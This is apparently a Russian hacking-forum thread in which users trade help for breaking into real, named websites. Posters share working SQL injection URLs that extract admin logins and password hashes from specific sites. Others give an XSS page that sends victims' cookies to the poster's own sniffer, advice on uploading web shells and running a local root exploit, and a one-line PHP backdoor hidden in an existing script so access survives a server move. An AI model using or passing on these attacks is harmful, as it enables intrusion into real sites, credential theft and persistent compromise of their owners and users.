Здравствуйте! Я долго копался на этом форуме и нашел где мне помогут насчет SQL-инъекции на сайте
Site:www.4what.com
Зайдя на https://www.4what.com/news.php?id=55' появилась ошибка:
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/fwhat/public_html/news.php on line 149
Далее зашел на
http://www.4what.com/news.php?id=-1+union+select+1,2,user+from+mysql.user/*
высветилось логин:4what
потом
http://www.4what.com/news.php?id=-1+union+select+null,mysql.user.password,null+from+ mysql.user/*
высветилось хэш:*832547126835E90D7CCB5772A85B0E6552904217
(а зачем звездочка?)
Дальше не знаю
Можно ли этот хэш поменять на свой? И какой командой(UPDATE? не получается че то)
И последний вопрос Подскажите что надо сделать что бы загрузитьт туда шелл
Спасибо вам за ответы кто ответит....

Там версия пятая. Какие проблемы?
table_name+from+information_schema.tables+limit+1, 1/*
И поехали...

Спасибо Ch3ck за помощь!

Народ help плиз. Вообщем тема такая на одном сервере *nix я залил shell но доступ имею только к своей папке и всё большинство опций разрешено, но я так как новичек не шибко могу сам пользоваться командами так как незнаю, я проверил все программы на уязвимость но админ следит за апргрейдами и постоянно обновляет. Я всегда пользовался эксплоитами и этого хватало пока, но теперь что делать только через брут или можно попробовать какие либо команды.
З.Ы. К папке этого пользователя под кем я зашел имею полный доступ.

Народ help плиз. Вообщем тема такая на одном сервере *nix я залил shell но доступ имею только к своей папке и всё большинство опций разрешено, но я так как новичек не шибко могу сам пользоваться командами так как незнаю, я проверил все программы на уязвимость но админ следит за апргрейдами и постоянно обновляет. Я всегда пользовался эксплоитами и этого хватало пока, но теперь что делать только через брут или можно попробовать какие либо команды.
З.Ы. К папке этого пользователя под кем я зашел имею полный доступ.
Попробуй cgi шелл .. (теги: telnet.cgi)

Помогите найти админку на сайте gta.com.ua

Вероятнее всего вот она...
http://gta.co.ua/admin/
но доступ закрыт, может по айпи

Врядли, мне надо куда то логин и пароль ввести, на форум не проходит, должна быть админка где нужна авторизация

Да ё моё, неужели никто из античата неможет найти эту грёбанную админку, с её грёбанным администратором который меня гад забанил, да ещё и нахомил, да ещё ина Sa.mp непускает

Да ё моё, неужели никто из античата неможет найти эту грёбанную админку, с её грёбанным администратором который меня гад забанил, да ещё и нахомил, да ещё ина Sa.mp непускаетПослушай, дружище, сдесь не базар. Если ты не умеешь читать, то никто не виноват, а если ты будешь так себя вести, то скоро и помогать перестанут

Red_Red1 тебе помоему дал линк, что по твоему это такое? просто тупо папка к которой закрыт доступ? Или если для тебя нет формы для ввода это не админка?

И даже если это не она, не надо тут голосить, тебе никто ничего не должен

Я просто прошу помощи, и читать я умею, EX me, просто админ ОЧЕНЬ плохой человек, но раз по IP админка, проксик не помогает, то как быть, как получить доступ то? сплоитов под форум тоже нету, по крайней мере не в привате

Спасибо за помощь BlackSun. На сервер залил telnet.cgi. Но вот тема какая я с командной строкой тяжело общаюсь пока. Я полазил по серверу доступ увеличился чуть-чуть, но я незнаю где можно посмотреть логи и т.д. и т.п. посоветуйте плиз или ссылку дайте буду очень благодарен.


Да и кстати мне интересно кто-нидь когда-нидь писал руководства к шеллам или все начинающие методом тыка пользуется, если есть ссылки дайте плиз, а то шеллов много а какие для чего понятия не имею.

http://trinitysquarevideo.com/exhibition.php?id=%27
помогите разобраться, на разные запросы никак не реагирует, по моему фильтрация какая то.как её обойти?

Просто не ставь в конце /*
http://trinitysquarevideo.com/exhibition.php?id=-2+union+select+1,2,3,version(),5,6,7,8,9,10

Плохо разбираюсь в MSSQL+asp что эт за ошибка, и есть ли тут уязвимость?

_http://www.itouch.ru/price.asp?r=261'

Спасибо за помощь BlackSun. На сервер залил telnet.cgi. Но вот тема какая я с командной строкой тяжело общаюсь пока. Я полазил по серверу доступ увеличился чуть-чуть, но я незнаю где можно посмотреть логи и т.д. и т.п. посоветуйте плиз или ссылку дайте буду очень благодарен.


Да и кстати мне интересно кто-нидь когда-нидь писал руководства к шеллам или все начинающие методом тыка пользуется, если есть ссылки дайте плиз, а то шеллов много а какие для чего понятия не имею.


используй c99madshell, только для начала в через блокнот открой и впиши логин и пасс, или r57shell а руководство мало кто делает, да и то если только для себя в качестве перевода

Плохо разбираюсь в MSSQL+asp что эт за ошибка, и есть ли тут уязвимость?

_http://www.itouch.ru/price.asp?r=261'
Нету здесь скули

http://gta.co.ua/file_sa_details.phtml?id=-1+union+select+1,2,3,4,5,6,7,user(),database(),ver sion(),11,12,13,14,15,16,17,18,19,20/*

Здравствуйте! :)

Подскажите:

залил c99madshell на сервер, этот сервер входит в интранет, где есть другие серверы, на которые из интранета можно попасть по http://, а из интернета - нельзя.

Подскажите, есть ли какой-нибудь броузер на php, которые можно было бы залить на сервер и через этот броузер уже от имени сервера (IP) заходить на другие сервера интранета?

Или как-то ещё можно попасть на http интранета?


Спасибо! :)

Остальные шеллы не дают просматривать папки к которым я якобы имею доступ, но telnet.cgi даёт, но увы только через командную строку. Может кто знает аналоги его, но более усовершенственные.

А какая религия запрещает изучить командную строку?

Здравствуйте! :)

Подскажите:

залил c99madshell на сервер, этот сервер входит в интранет, где есть другие серверы, на которые из интранета можно попасть по http://, а из интернета - нельзя.

Подскажите, есть ли какой-нибудь броузер на php, которые можно было бы залить на сервер и через этот броузер уже от имени сервера (IP) заходить на другие сервера интранета?

Или как-то ещё можно попасть на http интранета?


Спасибо! :)

поставь проксю :) https://sourceforge.net/projects/phpproxy/

или можешь настроить редирект

дело не в командной строке я ее знаю более или менее. Человек всегда ищет легкие решения для своих проблем.

З.Ы. По советуйце где есть информация о расположении папок в nix системах.

Нашол уязв

Просмотр запрещенных файлов

Ссылка - http://***.com/<<<<<<<<<<<<
Описание уязвимости : просмотр запрещенных файлов

Уязвимость Apache позволяет злоумышленнику читать недоступные файлы, путем прибавления символа "<" к запросу этих файлов.

Решение:

Установите последнюю версию.
http://www.apache.org/

Ссылки:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0017
http://www.apacheweek.com/issues/03-01-24#security

А как ее юзать не знаю :( подскажите к примеру как прочитать конфиг.пхп

Всем прива!
Тема актуальная! Подскажите пожалуйста чем можно по joomla по каталогам шарить я для этого использую joomla xplorer, что есть еще мож что по лучше))))

Помогите заюзать скюль инекцию и вытащить пас админа

тему я создал, но там никто не помог

http://release.master.dcms.su/info.php?id=1

$id=intval($anket);

имхо скулы нет, intval() - переводит в число без точки так что только числа а ими скулу не сделаешь)

Всем прива!
Тема актуальная! Подскажите пожалуйста чем можно по joomla по каталогам шарить я для этого использую joomla xplorer, что есть еще мож что по лучше))))

Если ты суперадмин, то можешь залить шелл через joomla xplorer (в папку images можешь сразу лить, т.к. там права 777 стоят) и потом гуляй по директориям :)

Вопрос как моно воспользоваться вот этим?

http://rk-triada.ru//d8cms/admin_themes/

И где моно найти ифу про cms nextweb и её уязвимости ,,??

Ивобще у этого сайта http://rk-triada.ru/ что нет уязвимости??? Лично я проверил вроде на все что знаю!

(заранее спасибо)

никак,просто права на диру не правильно стоят

Есть такой сайт http://www.modvlad.ru/

зделал такое http://www.modvlad.ru/photo/?g=-1+union+select+111,222,username,user_password,555, 666+from+forum_users+limit+0.1/*

но это только дял форума! как посмотреть всё что есть в базе? И моно залить туду шелл? И если моно то как?

geforce
вот так смотри все таблы..
http://www.modvlad.ru/photo/?g=-1+union+select+1,2,3,4,table_name,6+from+informati on_schema.tables/*
вот правельная база от форума..
http://www.modvlad.ru/photo/?g=-1+union+select+111,222,333,444,concat_ws(0x3a,user name,user_password),666+from+phpbb3_users+where+us er_id=2/*
Administrator:$H$9uIjBNujsrtCkk2HuMQPADk9w.i4Mr/
осталось разшифровать.. и залить шелл через темплейты)

А вот деся как мне залить shell???

http://wow.alania.net/gilds.php?guid=-3+union+select+1,concat_ws(0x3a,username,sha_pass_ hash),3,4,5,6,7,8,9,10,11,12+from+realmd.account+l imit+4,1/*

geforce
если есть пасс от админки то разшифруй... и войди в место входа)) а потом уже смотри Залить или не Залить )

Что значи (по енг то shellcode) я новичёк вобщето? (=

wow.alania.net
ну собсветнно для данного ресурса file_priv Нема то есть через скулю шелл не залить что не удивительно если пасс к админке лежит в базе попробуй его выташить и залить через админку )
Шелл-код (код оболочки, англ. shellcode) — это двоичный исполняемый код, который обычно передаёт управление консоли, например '/bin/sh' Unix shell, command.com в MS-DOS и cmd.exe в операционных системах Microsoft Windows. Код оболочки может быть использован как полезная нагрузка эксплойта, обеспечивая взломщику доступ к командной оболочке (англ. shell) в компьютерной системе.

При эксплуатации удаленной уязвимости шелл-код может открывать заранее заданый порт TCP уязвимого компьютера, через который будет осуществляться дальнейший доступ к командной оболочке, такой код называется привязывающим к порту (англ. port binding shellcode). Если шелл-код осуществляет подключение к порту компьютера атакующего, что производится с целью обхода брандмауэра или NAT, то такой код называется обратной оболочкой (англ. reverse shell shellcode).
взято из вики ;)

Что значи (по енг то shellcode) я новичёк вобщето? (=

если тебе для web уязвимости, то нужен webshell
хороший от маднета http://madnet.name/files/1/10.html

Люди где моно найти ифу про cms nextweb и её уязвимости ,,??

ttp://www.securitylab.ru/vulnerability/205726.php

а вот это инекция http://rk-triada.ru/index.php?page=999??

И это http://www.15rus.ru//e107_plugins/coppermine_menu/index.php?cat=-999??

Фильтрация, хороший сайт хорошая sql на нём) Но from фильтруется, Можно это кат-то обойти?

Есть подозрение на хостинг.

:D удалил

tor4)
Это спейс веб, фильтрует не from, а последовательность union+select+from, обходится POST'ом

а вот это инекция http://rk-triada.ru/index.php?page=999??

И это http://www.15rus.ru//e107_plugins/coppermine_menu/index.php?cat=-999??

http://rk-triada.ru/index.php?page=999-скорее всего есть,но это blind
http://www.15rus.ru//e107_plugins/coppermine_menu/index.php?cat=999-нет

http://rk-triada.ru/index.php?page=999-скорее всего есть,но это blind
http://www.15rus.ru//e107_plugins/coppermine_menu/index.php?cat=999-нет



А что значи blind???

А что значи blind???
слепая скуля

слепая скуля

Подскажите как сней работать! Или дайте инфу?

Подскажите как сней работать! Или дайте инфу?
https://forum.antichat.ru/thread35207.html

Подскажите как сней работать! Или дайте инфу?

Вот например
http://forum.antichat.ru/thread56221-blind+sql.html

Также на Ачате есть статья по blind inj ;)

хм столкнулся с такой проблемой есть скуль
http://www.stroyazbuka.com/news/index.php?idnews=9999999+and 1=1/*
количество столбцов подобраннно 13
при попытке вывести информацию о бд все нормально
http://www.stroyazbuka.com/news/index.php?idnews=99999999999+union+select+1,2,3,4, 5,6,7,concat_ws(0x1,User(),Database(),Version()),9 ,10,11,12,13/*

а вот когда пытаюсь сделать Запрос в таблицу редирректит на
http://2.sweb.ru/insecure
Насколько я понимаю это фильрация которую делает хотинг ? и можно ли её обойти ?

Три поста назад отвечал на тот же вопрос
https://forum.antichat.ru/showpost.php?p=828862&postcount=3054
Тему лень смотреть?

спс ;) Ну как то да 307 страниц смотреть как то лениво !!!
поиск по форуму зделал не чего не нашел !хм.. оказываеться все так просто как сам не догадался post попробовать видать тупею )

Нашол я XSS. При реге я вставляю код в mail такой вот
><script>alert('XSS')</script>
Нажимаю "Зарегистрироваться" так он мне XSS вышибает (ну я не удивился)
Сами вопросы:
1-Почему я когда вставляю "><script>alert('XSS')</script> то в то поле каторое я вставил это (то есть в в поле маил) то туда выплевываеться(когда я нажал на кннопку "Зарегиться") след код

><script>alert('XSS')</script>>> </td> </tr> <tr> <td> Секретный вопрос: </td> <td> <INPUT size=40 maxlength=50 TYPE=TEXT NAME=question> </td> </tr> <tr> <td> Секретный ответ: </td> <td> <INPUT size=40 maxlength=50 TYPE=TEXT NAME=answer value=

В чем дело???

2-Как можно заюзать эту XSS??? она же токо при реге

diznt
это пасивка.. врятле ты стыриш чито куки с этой хсс... т.к. она при реге) куков то еще нету ;)

Нашол я XSS. При реге я вставляю код в mail такой вот
><script>alert('XSS')</script>
Нажимаю "Зарегистрироваться" так он мне XSS вышибает (ну я не удивился)
Сами вопросы:
1-Почему я когда вставляю "><script>alert('XSS')</script> то в то поле каторое я вставил это (то есть в в поле маил) то туда выплевываеться(когда я нажал на кннопку "Зарегиться") след код

><script>alert('XSS')</script>>> </td> </tr> <tr> <td> Секретный вопрос: </td> <td> <INPUT size=40 maxlength=50 TYPE=TEXT NAME=question> </td> </tr> <tr> <td> Секретный ответ: </td> <td> <INPUT size=40 maxlength=50 TYPE=TEXT NAME=answer value=

В чем дело???

2-Как можно заюзать эту XSS??? она же токо при реге

Ссыль дай..

P.S sabe Не обяз......даже если так как ты думаешь....то можно составить скрипт..

Привет, не подскажете, как запустить сплоит на повышение привилегий в Linux 2.6.22-gentoo-r8 , а то залил шелл (с99), пытаюсь запустить сплойт через шелл, никаких изменений, пытаюсь запустить через www , так показывает только текст сплоита, подскажите пожалуйста , сплоит пытался запустить Linux Kernel 2.6.17 - 2.6.24.1 vmsplice Local Root Exploit

Нашол я XSS. При реге я вставляю код в mail такой вот
><script>alert('XSS')</script>
Нажимаю "Зарегистрироваться" так он мне XSS вышибает (ну я не удивился)
Сами вопросы:
1-Почему я когда вставляю "><script>alert('XSS')</script> то в то поле каторое я вставил это (то есть в в поле маил) то туда выплевываеться(когда я нажал на кннопку "Зарегиться") след код

><script>alert('XSS')</script>>> </td> </tr> <tr> <td> Секретный вопрос: </td> <td> <INPUT size=40 maxlength=50 TYPE=TEXT NAME=question> </td> </tr> <tr> <td> Секретный ответ: </td> <td> <INPUT size=40 maxlength=50 TYPE=TEXT NAME=answer value=

В чем дело???

2-Как можно заюзать эту XSS??? она же токо при реге



ответ 1:

в поле выплевывает вышеописанную лабуду т.к. ломается html код. зайдя в исходник страницы ты сможешь увидеть почему это происходит (советую скачать например notepad++ он выделит цветом где в коде незакрытые тэги и т.д)

ответ 2

заюзать xss вполне реально и неважно в каком месте сайта оно находиться =) все что нужно это составить html страничку которая будет post запросом передавать полю email соответсвующие параметры. а потом впарить жертве ссылку на эту страницу.

вот ссылка (http://forum.antichat.ru/threadnav23405-1-10.html) на статью с примером такой странички. там впринципе все написанно достаточно подробно.

т.е ты на своем серваке ставишь:
1. снифер
2. страничку с специально сформированным html кодом.
после чего через личное сообщение,чат или другие средства общения на сайте впариваешь ссылку. человек идет по ссылке и куки твои.

Вот кстати возникли проблеммы с данной процедурой получения кукисов.
нашел следующее xss на сайте.
в фотогалерее есть поле "текущая страница" (т.е. меняя значение в данном поле можно перемещаться по следующим страницам). при попытке поменять get параметры в адресной строке нарвался на фильтр
составил html код следующего вида

<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=windows-1251" />
</head>
<body onLoad="document.REPLIER.submit();"> <h3>сейчас вы будете перенаправлены</h3>
<form action="http://хххх.ru/index.php?page=log" method="post" name="REPLIER" ">
<input type='hidden' name='page' value=' "><script language="JavaScript">aa1 = new Image(); aa1.src="http://мой_сниффер/img.php?2222"+document.cookie;</script>'>
</form>
</body>
</html>

сниферить то сниферит но вот только без куков

т.е. в снифере остаеться ip и строка "2222"



пожалуйста подскажите почему в снифере не записываются куки и в чем моя ошибка?

funnyNe0, скорее всего фильтруется символ "+".

funnyNe0, скорее всего фильтруется символ "+".
Тогда проше подгрузить js с другого сайта (<script src=), а там уже все сделать все, что надо.

есть скул. запрос:
http://www.сайт/index.php?id=42222'+union+select+1,2,3+from+inform ation_schema.tables/*
сервер отвечает загрузкой страницы, такой же как
http://www.сайт/index.php?id=42222
пробую найти поля, которые выводятся на экран:
http://www.сайт/index.php?id=-1'+union+select+1,2,3+from+information_schema.tabl es/*
http://www.сайт/index.php?id=42222'+and+1=9+union+select+1,2,3+fro m+information_schema.tables/*
http://www.сайт/index.php?id='+union+select+1,2,3+from+information _schema.tables/*
Не получается. пишет ошибку. как ещё можно вывести на экран поля?

чет я не понимаю вопроса если честно! у тебя в скули нет полей для вывода ? если нет то только blind sql !и есче вопрос что ты пытался сделать этими запросами в базу ?

было такое.. попробуй посимвольным брутом

+and+substring(version(),1,1)=5
+and+substring(version(),1,1)=4
+and+substring(version(),1,1)=3

Если четвёртая или третяя не стоит заморачиваться, ИМХО.

Ды посимвольным это уже вообще конечный вариант. думал, может есть ещё способы!? ладно, будем др*читься посимвольвно :)

Нашел на античате шелл спрятанный под картинку
Есть система Slaed 3.5 и пару юзеров.
Как можно загрузить шелл через загрузку аватар? Как выполнять команды в этом случае?

Нашел на античате шелл спрятанный под картинку
Есть система Slaed 3.5 и пару юзеров.
Как можно загрузить шелл через загрузку аватар? Как выполнять команды в этом случае?
"Как можно загрузить шелл через загрузку аватар?" - Аплоадом=) Если он в нужном расширении.
"Как выполнять команды в этом случае?" - Уже по сути никак. Апачей таких не осталось почти. А способ с шеллом в картинке используется для локальных инклудов.

+and+substring(version(),1,1)=5
+and+substring(version(),1,1)=4
+and+substring(version(),1,1)=3

Если четвёртая или третяя не стоит заморачиваться, ИМХО.
там 5 версия) есть варианты решения?

есть скул. запрос:
http://www.сайт/index.php?id=42222'+union+select+1,2,3+from+inform ation_schema.tables/*
сервер отвечает загрузкой страницы, такой же как
http://www.сайт/index.php?id=42222
пробую найти поля, которые выводятся на экран:
http://www.сайт/index.php?id=-1'+union+select+1,2,3+from+information_schema.tabl es/*
http://www.сайт/index.php?id=42222'+and+1=9+union+select+1,2,3+fro m+information_schema.tables/*
http://www.сайт/index.php?id='+union+select+1,2,3+from+information _schema.tables/*
Не получается. пишет ошибку. как ещё можно вывести на экран поля?

попробуй -42222 поставить, или убрать кавычку..
вполне есть вариант что у твоего юзера mysql нету доступа к базе information_schema

AFoST
Ты уверен, что там именно 3 поля? Скинул бы ссылку, было б легче разобраться.Или хотя б ошибку опиши.
Мне кажется, что для посимвольного перебора ещё слишком рано, но тем не менее, ответ на твой вопрос
http://www.securitylab.ru/contest/212099.php
И в information_schema ты рано полез ))

попробуй -42222 поставить, или убрать кавычку..
вполне есть вариант что у твоего юзера mysql нету доступа к базе information_schema
к информейшн.схема доступ есть. ковычку убирать и ставить "-" пробовал. =(

AFoST
Ты уверен, что там именно 3 поля? Скинул бы ссылку, было б легче разобраться.Или хотя б ошибку опиши.
Мне кажется, что для посимвольного перебора ещё слишком рано, но тем не менее, ответ на твой вопрос
http://www.securitylab.ru/contest/212099.php
И в information_schema ты рано полез ))
там на самом деле 32 поля. но писать их тут долго) а вот с ошибкой там хз че. короче 2 варианта. либо белый экран, либо пишет что страница не найдена и выдает несколько символов из какого-то хеша в левой части экрана =\
ссылку пока не дам :P

AFoST Если скуль слепая, то либо перебор с подзапросами, либо ищи дыру в других параметрах. А вообще , если хочешь , кинь линк в ПМ , посмотрю

такс) прошлую проблему решил. теперь столкнулся с другой. вывожу на экран через мускул файл LOAD_FILE('/etc/passwd/logs/access.log') всё прекрасно работает. выводятся все записи и тд. в логах нашёл раскрытие путей и вывожу файл допустим такой LOAD_FILE('/home/www/name/name.ru/bla-bla/header.php') на что мне выводится на экран лишь часть аписанного в файле, примерно следующего содержания:

кусок кода страницы без скул-запроса:

<tr><td>
<a href="index.php?page=1&n=11&1187813822"><img src="66" width="90" height="90" border="1"></a>
</td>

<td width="140" class="ch5" valign="top">
<span class="ch2"><b>SQL-inj here</b></span><br>
0<br>
<a href="index.php?page=1&n=11&1187813822" class="ch5">view here</a>
</td></tr>
</table> </center>
<br>
</body>
</html>


кусок кода страницы с скул-запросом:

<tr><td>
<a href="index.php?page=1&n=11&1187813307"><img src=" ?>>

<head profile="http://123.ru/11/11">
<meta http-equiv="Content-Type" content="<?php bloginfo('htmltype')" width="90" height="90" border="1"></a>

</td>
<td width="140" class="ch5" valign="top">
<span class="ch2"><b><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" <?php languageattributes()</b></span><br>
charset=<?php bloginfo('charset')<br>
<a href="index.php?page=1&n=11&1187813307" class="ch5">view here</a>
</td></tr>
</table> </center>
<br>
</body>
</html>


Кусок файла выводится на экран и всё...я так подозреваю, что ф-ция LOAD_FILE встречает какой-то символ и начинает некорректно обрабатывать содержимое файла...
вопрос. как вывести всё содержимое файла?

возможно в поле ограничено кол-во символов
попробуй другие поля
и вообще для чтения файлов юзай Sipt 4 имхо намного удобней

возможно в поле ограничено кол-во символов
попробуй другие поля
и вообще для чтения файлов юзай Sipt 4 имхо намного удобней
ну я ж написал)
вывожу на экран через мускул файл LOAD_FILE('/etc/passwd/logs/access.log') всё прекрасно работает.
Значит не в ограниченности дело...
Sipt хм...скачаю посмотрю)

народ, поможите
_http://www.nailshop.ee/emall/detail.php?prodid=-1+order+by+5,2/*
из запроса ясно, что таблиц всего 5.
Но тут вылезает проблема ни к месту
"The used SELECT statements have a different number of columns" при запросе:
_http://www.nailshop.ee/emall/detail.php?prodid=-1+union+select+concat_ws(0x3a,database(),user(),ve rsion()),2,3,4,5/**/
как такое может быть??? Вксь мозг поломал уже

zjuk@
http://www.nailshop.ee/emall/detail.php?prodid=1+and+1=2+union+select+1,2,3,con cat_ws(0x3a,User(),Database(),Version()),5,6,7,8,9 ,0,1,2,3,4,5,6,7/*
Вывод в коде :

nailshop@localhost:nailshop_eMall:5.0.45-log

http://www.nailshop.ee/emall/detail.php?prodid=1+and+1=2+union+select+1,2,3,con cat_ws(0x3a,User(),Database(),Version()),5,6,7,8,9 ,0,1,2,3,4,5,6,7/*
Вывод в коде :

nailshop@localhost:nailshop_eMall:5.0.45-log

пасибо

доброго времени суток всем, подскажите, где подвох:
_http://datagate.ee/index.php?ln=rus&mid=-1+order+by+7,2/**/
из этого ясно, что полей 7, так как значения выше семи ругаются на несоответствие числа столбцов. Однако:
_http://datagate.ee/index.php?ln=rus&mid=1+and+1=2+union+select+userid,2,user,useremail ,userpassword,username,7+from+users/**/
снова ругается на кол-во столбцов, в чём же дело??? объясните пожалуйста

ну так правильно... тебе ж в прошлом посту написали что там 17 столбцов=)
http://www.nailshop.ee/emall/detail.php?prodid=1+and+1=2+union+select+1,2,3,con cat_ws(0x3a,login,password),5,6,7,8,9,0,1,2,3,4,5, 6,7+from+admin+limit+0,1/*

ну так правильно... тебе ж в прошлом посту написали что там 17 столбцов=)
не, с тем сайтом (nailshop.ee) я разобрался уже, спасибо. А тут уже другой сайт (datagate.ee) и случай вроде совсем не похожий, подскажите как с ним быть

проблемка с инъекцией:

описание:
нету выводимых полей (это не проблема)
к тому же локальный "инклуд" средствами copy(), по запрсу видно, что ОС винда

проблема заключается в объединение запросов sql, можно ли объеденить с запросом INTO OUTFILE ?



gallery.php?speichern=../../../../../../../../../../../../boot.ini', user_password='d41d8cd98f00b204e9800998ecf8427e' WHERE user_id=84 +--+

не, с тем сайтом (nailshop.ee) я разобрался уже, спасибо. А тут уже другой сайт (datagate.ee) и случай вроде совсем не похожий, подскажите как с ним быть

Ну там возможно просто два запроса что лишает возможности провести инъекцию с выводом данных, но никто не мешает раскрутить её посимвольно:

version(): PostgreSQL 8.2.7 on i686-pc-linux-gnu, compiled by GCC gcc (GCC) 4.1.1 (Gentoo 4.1.1-r3)
current_database(): portal

Кстати т.к. это ПостгриСКЛ, то синтаксис чуть чуть отличается, так что может тебе и удастся раскрутить её не как слепую.

Смотри статьи:

https://forum.antichat.ru/showthread.php?t=35599 - здесь немного рассказано про инъекции в скриптах, использующих PostgreSQL.

https://forum.antichat.ru/thread19844.html - а здесь рассказано про работу со слепыми инъекциями.

Здравствуйте! :)

Подскажите, пожалуйста:

в скором времени с сервера, на котором сейчас стоит шелл, все файлы будут переносить на новый сервер, и, вероятно, мой шелл найдут.
Пока есть возможность, хочется незаметно добавить в php-файл акой-нибудь, свой код, чтобы через него можно было залить шелл на новом сервере.

Подскажите, какой код можно добавить в существующий php-файл не очень большого размера (строк 100), чтобы это было как можно меньше заметно разработчикам?

функция system - отключена :)

Спасибо!

Здравствуйте! :)

Подскажите, пожалуйста:

в скором времени с сервера, на котором сейчас стоит шелл, все файлы будут переносить на новый сервер, и, вероятно, мой шелл найдут.
Пока есть возможность, хочется незаметно добавить в php-файл акой-нибудь, свой код, чтобы через него можно было залить шелл на новом сервере.

Подскажите, какой код можно добавить в существующий php-файл не очень большого размера (строк 100), чтобы это было как можно меньше заметно разработчикам?

функция system - отключена :)

Спасибо!

Добавь строку:

if(isset($_GET['act']) and iseet($_GET['id4'])) preg_replace("/55/e",$_GET['act'],$_GET['id4']);

И обращайся к серву так:

script.php?id4=55&act=phpinfo();
script.php?id4=55&act=[PHPCODE]

Сможешь выполнять php код.
Помоему это достаточно компактный и безпалевный вариант троянизации скриптов.

>>Помоему это достаточно компактный и безпалевный вариант троянизации скриптов.

Лучше уж тогда $_REQUEST["act"], post или cookie по безпалевней будут. Хотя вариантов море впринципе.

БД MS ACCESS
site.com/Def.asp?id=222+1,2,mail,4,5+from+costumers
возникла такая проблема знаю имя табцицы и имя нужной колонки каким образом можно вывести инфу ? лимита там нет можно чем нибудь заменить ? where тоже воспользоваться не получаеться ((
заранее спасибо

Здравствуйте! :)

Подскажите, пожалуйста:

в скором времени с сервера, на котором сейчас стоит шелл, все файлы будут переносить на новый сервер, и, вероятно, мой шелл найдут.
Пока есть возможность, хочется незаметно добавить в php-файл акой-нибудь, свой код, чтобы через него можно было залить шелл на новом сервере.

Подскажите, какой код можно добавить в существующий php-файл не очень большого размера (строк 100), чтобы это было как можно меньше заметно разработчикам?

функция system - отключена :)

Спасибо!
https://forum.antichat.ru/showthread.php?t=33690

Здраствуйте,у меня вот возникла такая проблема,я вот нашел уязвимость на сайте,я могу через ссылку в страницу запихнуть любой код, и html и javascript,все что вожу,все отображается на странице,вот только одно то что php никаким образом там не идет,я какой скрипт в страницу не запыхиваю,то сервер его не обрабатывает,а в исходном коде страницы виден всесь скрипт,и есче там фильтр перед ' и " ставит \ как можно залить шелл на етот сайт,есле пхп код когда оказывается в странице не работает....кста,а просто пхп там работает,там весь сайт построин из пхп страниц,и есче,там сервер у них стоит LiteSpeed Web Server может кто подскажит что делать дальше???

Здраствуйте,у меня вот возникла такая проблема,я вот нашел уязвимость на сайте,я могу через ссылку в страницу запихнуть любой код, и html и javascript,все что вожу,все отображается на странице,вот только одно то что php никаким образом там не идет,я какой скрипт в страницу не запыхиваю,то сервер его не обрабатывает,а в исходном коде страницы виден всесь скрипт,и есче там фильтр перед ' и " ставит \ как можно залить шелл на етот сайт,есле пхп код когда оказывается в странице не работает....кста,а просто пхп там работает,там весь сайт построин из пхп страниц,и есче,там сервер у них стоит LiteSpeed Web Server может кто подскажит что делать дальше???
ыыыы давно так не смеялся =)
через xss ты не сможешь исполнить php код =), только яваскрипт на стороне клиента. Скорей бы школа..

http://forum.antichat.ru/showpost.php?p=836658&postcount=3099
отвечю сам на cвой вопрос нужно юзать select TOP X * from table
выводит X стоку из table )
всем спасибо :)

ыыыы давно так не смеялся =)
через xss ты не сможешь исполнить php код =), только яваскрипт на стороне клиента. Скорей бы школа..

Гг,ето мне уже обьяснили)) Ну хоть веселее стало те))И за школу не боись,день рождение дьявола будет уже скоро, до 1 числа есче 3 дня.... :( есле бы 3 месяца...

Всем снова здоавствуйте, такая проблема:
при запросе
_http://www.lacucaracha.ee/index.php?mod=komm&return_params=mod%3Dnews&f_id=2&t_text=LAULUV%D5ISTLUSE%20FINAAL&h_id=-1+union+select+TABLE_NAME,2,3,4+FROM+INFORMATION_S CHEMA.TABLES+LIMIT+23,1/**/
получаем:
Unknown column 'cucca_logins' in 'where clause'
если попробовать проработать таблицу 'cucca_logins':

_http://www.lacucaracha.ee/index.php?mod=komm&return_params=mod%3Dnews&f_id=2&t_text=LAULUV%D5ISTLUSE%20FINAAL&h_id=-1+union+select+COLUMN_NAME,2,3,4+FROM+INFORMATION_ SCHEMA.COLUMNS+where+TABLE_NAME=cucca_logins+limit +23,1/**/
И опять получаем:
Unknown column 'cucca_logins' in 'where clause'
с cucca_users таже истории
Помогите пожалуйста, что я делаю не так?

во-первых, /**/ ты открыл комментарий и тут же его закрыл. измени /**/ на /* или --
во-вторых, возми в ковычки во втором запросе cucca_logins
в-третьих, пропиши limit 1,10 для начала

во-первых, /**/ ты открыл комментарий и тут же его закрыл. измени /**/ на /* или --
во-вторых, возми в ковычки во втором запросе cucca_logins
в-третьих, пропиши limit 1,10 для начала
с кавычками меня послали, LIMIT в данном случае значения не имеет, а замена /**/ на -- ни к чему не привела.

Скачай SIPT (http://forum.antichat.ru/thread24918-SIPT.html)
Настройки поставь

URL=http://www.lacucaracha.ee/index.php?mod=komm&return_params=mod%3Dnews&f_id=2&t_text=LAULUV%D5ISTLUSE%20FINAAL&h_id=-1{SQLINJ}
Key=Unknown column
Search key by=Found
Close SQL=(ничего)

и все. /* тут вообще не надо и без него работает.
у меня работает и все находит.

Все работает. Под чаром cucca_logins , так как кавчки экранирует
http://www.lacucaracha.ee/index.php?mod=menyy&kat=-4+union+select+1,2,column_name,4,5,6,7,8,9+from+in formation_schema.columns+where+table_name=CHAR(99, 117,99,99,97,95,108,111,103,105,110,115)--

Все работает. Под чаром cucca_logins , так как кавчки экранирует
спасибо большое, оказывается в запросе очипятывался =)

Скачай SIPT (http://forum.antichat.ru/thread24918-SIPT.html)
Настройки поставь
Спасибо есть, тока при поиске столбцов вылетает =( а при поиске таблиц нормально.
Пасибки всем

Спасибо есть, тока при поиске столбцов вылетает =( а при поиске таблиц нормально.

попробуй с моими настройками может прокатит, то у меня столбцы показывает. Если не получиться, говори в какой таблице столбцы надо

помогите определить тип хеша
%C6%EF%23%5D%B6%E8%E9%3D%3B%A7%D0%A9%18%9FX%C1%13% 08s%D5%B0%DAG%5CF%DFV%DA%0D%DE%BCe
вот ещё один
1%FC%D47__%F8%B97x%1E%3F8%212_%D1%FA%AA_%11o%D3%D2 %21%3FK%06%B4%02U%24
двиг сайта с которого выдрал хеши самописный
з.ы. хеши без пробелов

это url кодировка

html_full походу

вот faq о хэшах:

